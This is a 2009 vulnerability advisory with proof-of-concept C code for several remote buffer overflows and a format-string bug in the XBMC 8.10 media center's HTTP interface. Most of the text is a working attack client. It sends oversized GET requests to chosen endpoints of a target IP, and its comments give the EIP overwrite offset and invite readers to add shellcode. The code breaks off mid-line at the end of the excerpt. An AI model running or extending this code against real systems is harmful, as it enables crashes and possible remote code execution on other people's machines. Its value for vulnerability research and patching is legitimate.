xbmc810requests-overflow.txt
Posted on 01 April 2009
/* XBMC multiple remote buffer overflow vulnerabilities. XBMC is an award winning media center application for Linux, Mac OS X, Windows and XBox. The ultimate hub for all your media, XBMC is easy to use, looks slick, and has a large helpful community.XBMC has won many awards. Affected version: XBMC 8.10 Atlantis Tested on: Windows xpsp3 and linux unbuntu 8.10 Venders web site : http://xbmc.org/ Release date:April the 1st 2009 Credits go to n00b for finding the buffer overflow and writing simple yet effective poc code. Shout's to every one that knows me and have helped over the years. Please if u do wish to write a exploit for the buffer overflow please give credits. also you will have to filter the bad chars from shellcode if you do wish to write exploit for the voulnrabilitys in this advisory. ---------- Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Educational use only..!! You can call by my blog to leave comments and feed back and ask any questions you would like.Should be up and runing in a few days. [--] http://n00b-n00b.blogspot.com/ [--] This poc code was writen on linux using gcc-4.* to compile. */ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> /*Just enough recived buffer to allow for the server banner!!*/ #define BUFFSIZE 32 void error(char *mess) { perror(mess); exit(1); } int main(int argc, char *argv[]) { int sock; int input; struct sockaddr_in http_client; char buffer[BUFFSIZE]; /*You may need to add more buffer on linux versions!! on windows its <1010> bytes to own eip next 4 bytes are loaded into the $esp register.*/ char buffer1[1500]; unsigned int http_len; int received = 0; /* If there is more than 2 arguments passed print usage!!*/ if (argc != 3) { fprintf(stderr,"USAGE: Server_ip port "); exit(1); } /* Create socket */ if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { error("Cant create socket"); } /* Construct sockaddr */ memset(&http_client, 0, sizeof(http_client)); http_client.sin_family = AF_INET; http_client.sin_addr.s_addr = inet_addr(argv[1]); http_client.sin_port = htons(atoi(argv[2])); /* Establish connection */ if (connect(sock, (struct sockaddr *) &http_client, sizeof(http_client)) < 0) { error("Failed to connect with remote host"); } /*We need to Construct all the voulnrable request togeather*/ memset( buffer1, 0x41, sizeof(buffer1) - 1 ); printf( "---------------------------------------------------------------- " ); printf( "XBMC remote buffer overflow poc code by n00b !! " ); printf( "---------------------------------------------------------------- " ); printf( "[1]. Get request buffer overflow poc !! " ); printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !! " ); printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !! " ); printf( "[4]. queryvideodatabase possible format string poc !! " ); printf( "---------------------------------------------------------------- " ); printf( "---------------------------------------------------------------- " ); printf( "[5]. Cancel and quit application !! " ); printf( "---------------------- " ); printf( "Pick your http request: " ); scanf( "%d", &input ); switch ( input ) { case 1: memcpy ( buffer1, "GET /", 5); memcpy ( buffer1 +(sizeof(buffer1) - 1) - 21, ".asp HTTP/1.1 ", 21); break; case 2: memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46); memcpy ( buffer1 +(sizeof(buffer1) - 1) - 41, ".jpg;false;0;300;200;90) HTTP/1.1 ", 41); break; case 3: memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53); memcpy ( buffer1 +(sizeof(buffer1) - 1) - 23, ".mp3) HTTP/1.1 ", 23); break; case 4: memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1 ", 76); break; case 5: exit(0); break; } /* Send our get request to the server*/ http_len = strlen(buffer1); if (send(sock, buffer1, http_len, 0) != http_len) { error("No byte's where sent to remote host check Get request !!"); } /* Receive the current state of the server*/ fprintf(stdout, "Received: "); while (received < http_len) { int bytes = 0; if ((bytes = recv(sock, buffer, BUFFSIZE-1, 0)) < 1) { error("Was the banner received?? if no banner exploit was successfull!!"); } received += bytes; buffer[bytes] = '